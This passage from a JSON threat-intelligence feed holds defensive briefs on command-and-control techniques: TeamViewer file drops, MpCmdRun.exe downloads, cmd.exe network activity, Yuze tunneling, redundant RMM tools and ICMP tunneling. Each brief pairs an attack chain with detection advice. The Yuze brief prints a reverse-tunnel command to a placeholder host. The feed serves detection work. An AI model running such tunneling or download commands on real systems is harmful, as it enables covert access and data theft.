they also abuse legitimate utilities like TeamViewer to drop these files. TeamViewer is a remote access and control tool frequently used by help desks and system administrators for support activities; however, attackers and scammers also leverage it to deploy malware and conduct other malicious activities. This detection identifies instances of the TeamViewer process creating files with suspicious extensions on Windows systems, indicating potential misuse of the tool for unauthorized file transfers. The rule is designed to detect suspicious remote file copies during TeamViewer sessions, focusing on files with extensions commonly associated with executables and scripts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system through various means.\u003c/li\u003e\n\u003cli\u003eThe attacker installs or leverages an existing TeamViewer instance on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a remote connection to the compromised system using TeamViewer.\u003c/li\u003e\n\u003cli\u003eThe attacker initiates a file transfer session within TeamViewer.\u003c/li\u003e\n\u003cli\u003eThe attacker transfers a malicious executable or script file (e.g., .exe, .dll, .ps1) to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe transferred file is saved to a location on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the transferred file, leading to further malicious activities such as malware installation or command execution.\u003c/li\u003e\n\u003cli\u003eThe attacker performs post-exploitation activities, like lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation via remote file copy can lead to the introduction of malware into the targeted environment, potentially compromising sensitive data and causing 
significant operational disruption. The severity of the impact depends on the nature of the transferred file and the subsequent actions performed by the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eTeamViewer Remote File Copy\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule by examining process execution chains and file origins.\u003c/li\u003e\n\u003cli\u003eBlock the file extensions listed in the \u003ccode\u003efile.extension\u003c/code\u003e field in the query at the network level to prevent the transfer of potentially malicious files.\u003c/li\u003e\n\u003cli\u003eEnable Elastic Defend or SentinelOne Cloud Funnel to collect the necessary file creation events to trigger the detection.\u003c/li\u003e\n\u003cli\u003eReview TeamViewer usage within your organization and restrict its use to authorized personnel only.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-teamviewer-file-copy/","summary":"Attackers may abuse legitimate utilities such as TeamViewer to deploy malware interactively by remotely copying executable or script files during a TeamViewer session.","title":"Remote File Copy via TeamViewer","url":"https://feed.craftedsignal.io/briefs/2024-01-teamviewer-file-copy/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows Defender"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","ingress-tool-transfer","windows","mpcmdrun"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers are leveraging the built-in Windows Defender command-line utility, \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e, to download files from remote locations. 
This technique allows attackers to bypass traditional download restrictions and blend in with legitimate system activity. The \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e utility is normally used to manage Windows Defender settings and perform tasks such as signature updates and scans. However, its \u003ccode\u003e-DownloadFile\u003c/code\u003e parameter can be abused to download arbitrary files from a specified URL. This activity was first publicly reported around September 2020. Defenders should monitor for unusual usage patterns of \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e, especially those involving command-line arguments related to file downloads from external sources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a target system through an unrelated vulnerability or existing compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e to download a file from a remote server. The command includes arguments like \u003ccode\u003e-DownloadFile\u003c/code\u003e, \u003ccode\u003e-url\u003c/code\u003e, and \u003ccode\u003e-path\u003c/code\u003e to specify the download location and save path.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to a location on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded file. 
This could be a malicious executable, a script, or a configuration file.\u003c/li\u003e\n\u003cli\u003eThe executed file performs further malicious actions on the system, such as establishing persistence, escalating privileges, or deploying additional payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system as a foothold to move laterally within the network, compromising other systems and resources.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their ultimate objective, such as data exfiltration, ransomware deployment, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to introduce arbitrary malicious code into the system, potentially leading to a wide range of adverse effects, including data theft, system compromise, and disruption of operations. While individual cases may be limited in scope, widespread exploitation could impact numerous organizations, resulting in significant financial losses and reputational damage. 
The use of a trusted system utility makes this technique harder to detect using traditional methods.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eMpCmdRun Remote File Download\u003c/code\u003e to your SIEM to detect the malicious use of \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e for downloading files.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging with command-line arguments to provide the necessary data for the Sigma rule to function.\u003c/li\u003e\n\u003cli\u003eReview historical process execution logs for instances of \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e being used with the \u003ccode\u003e-DownloadFile\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted executables downloaded by \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-03-mpcmdrun-remote-file-copy/","summary":"Attackers are abusing the Windows Defender MpCmdRun.exe utility to download remote files, potentially delivering malware or offensive tools into compromised systems.","title":"MpCmdRun.exe Used for Remote File Download","url":"https://feed.craftedsignal.io/briefs/2024-01-03-mpcmdrun-remote-file-copy/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","Excel","MS Access","MS Publisher","PowerPoint","Word","Outlook"],"_cs_severities":["low"],"_cs_tags":["command-prompt","network-connection","windows","execution","command-and-control"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies suspicious network connections initiated by the command prompt (cmd.exe) on Windows systems. 
The rule focuses on cmd.exe processes executed with specific arguments, such as those indicating script execution (e.g., *.bat, *.cmd), access to remote resources (e.g., URLs), or those spawned by Microsoft Office applications (Excel, Word, etc.). Attackers frequently abuse cmd.exe to download malicious payloads, execute commands, or establish command and control channels. This detection aims to identify such potentially malicious activity by correlating process creation events with subsequent network connections. The rule excludes common private and reserved IP address ranges to reduce false positives. The targeted systems are Windows endpoints where adversaries attempt to leverage cmd.exe for malicious purposes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user opens a malicious document (e.g., Word, Excel) or executes a seemingly benign application.\u003c/li\u003e\n\u003cli\u003eThe document or application contains a macro or script that initiates a cmd.exe process.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process is launched with arguments indicating script execution (\u003ccode\u003e/c\u003c/code\u003e, \u003ccode\u003e/k\u003c/code\u003e) and referencing a remote resource (e.g., a URL) or a local batch file.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process attempts to download a payload from a remote server using protocols like HTTP, HTTPS, or FTP.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often with a disguised filename.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process executes the downloaded payload, initiating further malicious actions.\u003c/li\u003e\n\u003cli\u003eThe malicious payload establishes a command and control (C2) channel with a remote server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to send commands to the compromised system, potentially leading to data exfiltration or other malicious 
activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the compromise of Windows endpoints, potentially enabling attackers to download and execute malicious payloads, establish command and control channels, and perform further malicious activities such as data theft, lateral movement, or ransomware deployment. While this detection has a low severity, it serves as an early warning sign of potential compromise and should be investigated promptly.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the full context of cmd.exe executions.\u003c/li\u003e\n\u003cli\u003eMonitor network connections from cmd.exe processes, focusing on connections to external IP addresses, using a network monitoring solution.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious cmd.exe network connections.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, focusing on cmd.exe processes spawned by Office applications or those executing scripts from remote URLs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-suspicious-cmd-network/","summary":"This alert identifies suspicious network connections initiated by the command prompt (cmd.exe) when executed with arguments indicative of script execution, remote resource access, or originating from Microsoft Office applications, which is a common tactic for downloading payloads or establishing command and control.","title":"Suspicious Command Prompt Network Connection","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-cmd-network/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","Elastic 
Endgame"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","tunneling","yuze","proxy"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis rule detects the execution of Yuze, an open-source tunneling tool written in C, which is commonly used for intranet penetration. Yuze supports both forward and reverse SOCKS5 proxy tunneling and is often executed using \u003ccode\u003erundll32\u003c/code\u003e to load \u003ccode\u003eyuze.dll\u003c/code\u003e with the \u003ccode\u003eRunYuze\u003c/code\u003e export. Threat actors can leverage Yuze to proxy command and control (C2) communications or to pivot within a network. The detection focuses on identifying processes with command-line arguments indicative of Yuze execution, specifically those involving \u0026ldquo;reverse,\u0026rdquo; \u0026ldquo;-c,\u0026rdquo; \u0026ldquo;proxy,\u0026rdquo; \u0026ldquo;fwd,\u0026rdquo; and \u0026ldquo;-l\u0026rdquo; parameters. This activity has been observed in real-world campaigns, increasing the importance of timely detection and response.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a target system through various means (e.g., phishing, exploitation of vulnerabilities).\u003c/li\u003e\n\u003cli\u003eThe attacker uploads or drops the \u003ccode\u003eyuze.dll\u003c/code\u003e file onto the compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003erundll32.exe\u003c/code\u003e to execute \u003ccode\u003eyuze.dll\u003c/code\u003e, calling the \u003ccode\u003eRunYuze\u003c/code\u003e export.\u003c/li\u003e\n\u003cli\u003eThe command line includes parameters to establish a reverse or forward SOCKS5 proxy tunnel (e.g., \u003ccode\u003erundll32 yuze.dll,RunYuze reverse -c \u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eYuze establishes a tunnel 
to a remote server, allowing the attacker to proxy network traffic.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established tunnel to pivot within the network and access internal resources.\u003c/li\u003e\n\u003cli\u003eThe attacker may proxy C2 traffic through the tunnel, masking the true origin of the commands.\u003c/li\u003e\n\u003cli\u003eThe attacker performs actions on the internal network, such as data exfiltration or lateral movement, using the tunnel as a covert channel.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to establish covert communication channels, bypass network security controls, and proxy malicious traffic, potentially leading to unauthorized access to sensitive data, lateral movement within the network, and data exfiltration. The use of Yuze can obscure the origin of attacks, making attribution more difficult and hindering incident response efforts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential Yuze Tunneling via Rundll32\u0026rdquo; to your SIEM to detect the execution of \u003ccode\u003eyuze.dll\u003c/code\u003e via \u003ccode\u003erundll32.exe\u003c/code\u003e with specific command-line arguments.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging (Sysmon Event ID 1 or Windows Security Auditing) to capture the necessary command-line information for the Sigma rules.\u003c/li\u003e\n\u003cli\u003eInvestigate any identified instances of \u003ccode\u003erundll32.exe\u003c/code\u003e executing \u003ccode\u003eyuze.dll\u003c/code\u003e, focusing on the parent processes and network connections.\u003c/li\u003e\n\u003cli\u003eBlock the C2/relay IP or domain found in the \u003ccode\u003e-c\u003c/code\u003e argument at DNS/firewall, as described in the Triage and Analysis section of the rule\u0026rsquo;s 
note.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-yuze-tunneling/","summary":"This alert detects potential protocol tunneling activity via the execution of Yuze, a lightweight open-source tunneling tool often used by threat actors for intranet penetration via forward and reverse SOCKS5 proxy tunneling.","title":"Potential Protocol Tunneling via Yuze","url":"https://feed.craftedsignal.io/briefs/2024-01-yuze-tunneling/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AeroAdmin","AnyDesk","Atera Agent","AweSun","APC Admin","APC Host","BeyondTrust","Remote Support","BarracudaRMM","Domotz Agent","DWService","FleetDeck Commander","GetScreen","GoTo","Impero Client","Impero Server","ISLLight","ISLLightClient","JumpCloud Agent","Level","LvAgent","LogMeIn","Lunixar","ManageEngine Remote Access Plus","MeshAgent","Mikogo","NinjaRMMAgent","NinjaRMMAgenPatcher","ninjarmm-cli","Parsec","Pulseway","Radmin","RealVNC","RemotePC","RemoteDesktopManager","RPCSuite","RustDesk","RemoteUtilities","Kaseya","ScreenConnect","Splashtop","Supremo","SyncroLive","TacticalRMM","Tailscale","TeamViewer","Tiflux","ToDesk","Twingate","TightVNC","UltraVNC","UltraViewer","AnyAssist","Velociraptor","ToolsIQ","ZohoAssist"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","rmm","windows","threat-detection"],"_cs_type":"advisory","_cs_vendors":["AeroAdmin","AnyDesk","Atera","AweSun","APC","BeyondTrust","BarracudaRMM","Domotz","DWService","FleetDeck","GetScreen","GoTo","Impero","ISLOnline","JumpCloud","Level","LogMeIn","Lunixar","ManageEngine","MeshCentral","Mikogo","NinjaOne","Parsec","Pulseway","Radmin","RealVNC","RemotePC","Devolutions","RPCSuite","RustDesk","RemoteUtilities","Kaseya","ScreenConnect","Splashtop","Supremo","TacticalRMM","Tailscale","TeamViewer","Tiflux","ToDesk","Twingate","TightVNC","UltraVNC","UltraViewer","AnyAssist","Velociraptor","ToolsIQ","ZohoAssist"],"cont
ent_html":"\u003cp\u003eThis detection rule identifies Windows hosts running multiple remote monitoring and management (RMM) tools from different vendors within an eight-minute timeframe. While legitimate MSP environments may utilize multiple tools, this activity can also indicate malicious behavior, such as an attacker establishing redundant access to a compromised system. The rule maps various RMM processes to vendor labels, ensuring that multiple binaries from the same vendor do not inflate the count. The processes monitored include popular RMM tools like TeamViewer, AnyDesk, ScreenConnect, and many others. This rule is designed to detect suspicious activity within the environment and alert security teams to potential compromises. The timeframe is set to eight minutes to reduce false positives.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: An attacker gains initial access to a Windows host, possibly through phishing or exploitation of a vulnerability.\u003c/li\u003e\n\u003cli\u003eTool Deployment: The attacker deploys an initial RMM tool for remote access and control.\u003c/li\u003e\n\u003cli\u003eSecondary Tool Deployment: The attacker deploys a second RMM tool from a different vendor to ensure redundant access in case the first tool is detected or removed.\u003c/li\u003e\n\u003cli\u003ePrivilege Escalation: The attacker escalates privileges to gain SYSTEM or Administrator rights, if necessary, to maintain persistent access and control.\u003c/li\u003e\n\u003cli\u003eLateral Movement: The attacker uses the RMM tools to move laterally within the network to access additional systems and data.\u003c/li\u003e\n\u003cli\u003eData Exfiltration/Malicious Activity: The attacker uses the established RMM connections to exfiltrate sensitive data or perform other malicious activities such as deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to unauthorized access to sensitive systems and data, potentially resulting in data breaches, financial loss, and reputational damage. This detection rule helps identify hosts that might be compromised by malicious actors utilizing multiple RMM tools for command and control. Identifying potentially compromised systems is key to preventing widespread damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM to detect multiple RMM tools running on the same host within an eight-minute window.\u003c/li\u003e\n\u003cli\u003eInvestigate systems triggering this alert by reviewing process execution logs and network connections to identify the source of the RMM tool installation.\u003c/li\u003e\n\u003cli\u003eEnforce a policy of a single approved RMM stack per asset class to minimize the risk of unauthorized RMM tool usage.\u003c/li\u003e\n\u003cli\u003eTune the provided Sigma rules with host or organizational unit exceptions for legitimate MSP/IT tooling environments.\u003c/li\u003e\n\u003cli\u003eReview asset inventory and change tickets for approved RMM software to identify unauthorized installations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-02-multiple-rmm-vendors/","summary":"This detection identifies a Windows host where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window, potentially indicating compromise, shadow IT, or attacker staging of redundant access.","title":"Multiple Remote Management Tool Vendors on Same Host","url":"https://feed.craftedsignal.io/briefs/2024-01-02-multiple-rmm-vendors/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk 
Enterprise","Splunk Enterprise Security","Splunk Cloud","Cisco Secure Access Firewall","Palo Alto Network Traffic"],"_cs_severities":["medium"],"_cs_tags":["network-traffic","command-and-control","data-exfiltration"],"_cs_type":"advisory","_cs_vendors":["Splunk","Cisco","Palo Alto"],"content_html":"\u003cp\u003eThis detection focuses on identifying anomalous ICMP (Internet Control Message Protocol) traffic indicative of malicious activity. ICMP is typically used for network diagnostics but can be abused for covert communication, data exfiltration, or command-and-control (C2) by threat actors. This analytic identifies ICMP traffic exceeding 1,000 bytes directed toward external IP addresses, filtering out internal networks. The detection logic leverages the Network_Traffic data model. Validated malicious instances may signal ICMP tunneling, unauthorized data transfer, or compromised endpoints. The data sources for this analytic include Palo Alto Network Traffic and Cisco Secure Access Firewall logs.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker compromises a host within the network.\u003c/li\u003e\n\u003cli\u003eThe compromised host initiates ICMP traffic to an external IP address.\u003c/li\u003e\n\u003cli\u003eThe ICMP traffic exceeds 1000 bytes, evading default network monitoring thresholds.\u003c/li\u003e\n\u003cli\u003eThe attacker uses ICMP to tunnel data, bypassing normal data transfer protocols.\u003c/li\u003e\n\u003cli\u003eThe compromised host uses ICMP for command and control, receiving instructions from the external attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a covert communication channel using ICMP, masking their activity within normal network traffic.\u003c/li\u003e\n\u003cli\u003eSensitive data is exfiltrated via ICMP packets to the attacker-controlled external server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation through large ICMP traffic can lead to data breaches, unauthorized access to internal resources, and the establishment of persistent command and control within the network. ICMP tunneling can bypass traditional security measures, allowing attackers to operate undetected. The impact of successful exploitation includes the potential compromise of sensitive data, disruption of network services, and financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Large ICMP Traffic\u003c/code\u003e to your SIEM and tune the byte threshold (currently 1000 bytes) based on your network baseline to minimize false positives.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the \u003ccode\u003eDetect Large ICMP Traffic\u003c/code\u003e rule, focusing on the source and destination IPs involved.\u003c/li\u003e\n\u003cli\u003eExamine network traffic logs for patterns indicative of ICMP tunneling or covert communication channels, using the provided data sources.\u003c/li\u003e\n\u003cli\u003eUtilize the provided search \u003ccode\u003eView the detection results\u003c/code\u003e to review related events and potential lateral movement.\u003c/li\u003e\n\u003cli\u003eImplement the provided search \u003ccode\u003eView risk events\u003c/code\u003e to look at risk factors for the involved assets.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T10:00:00Z","date_published":"2024-01-02T10:00:00Z","id":"/briefs/2024-01-large-icmp-traffic/","summary":"This analytic identifies excessive ICMP traffic to external IP addresses exceeding 1,000 bytes, potentially indicating command and control activity, data exfiltration, or covert communication channels.","title":"Large ICMP Traffic 
Detection","url":"https://feed.craftedsignal.io/briefs/2024-01-large-icmp-traffic/"}],"language":"en","title":"CraftedSignal Threat Feed — Command and Control","version":"https://jsonfeed.org/version/1.1"}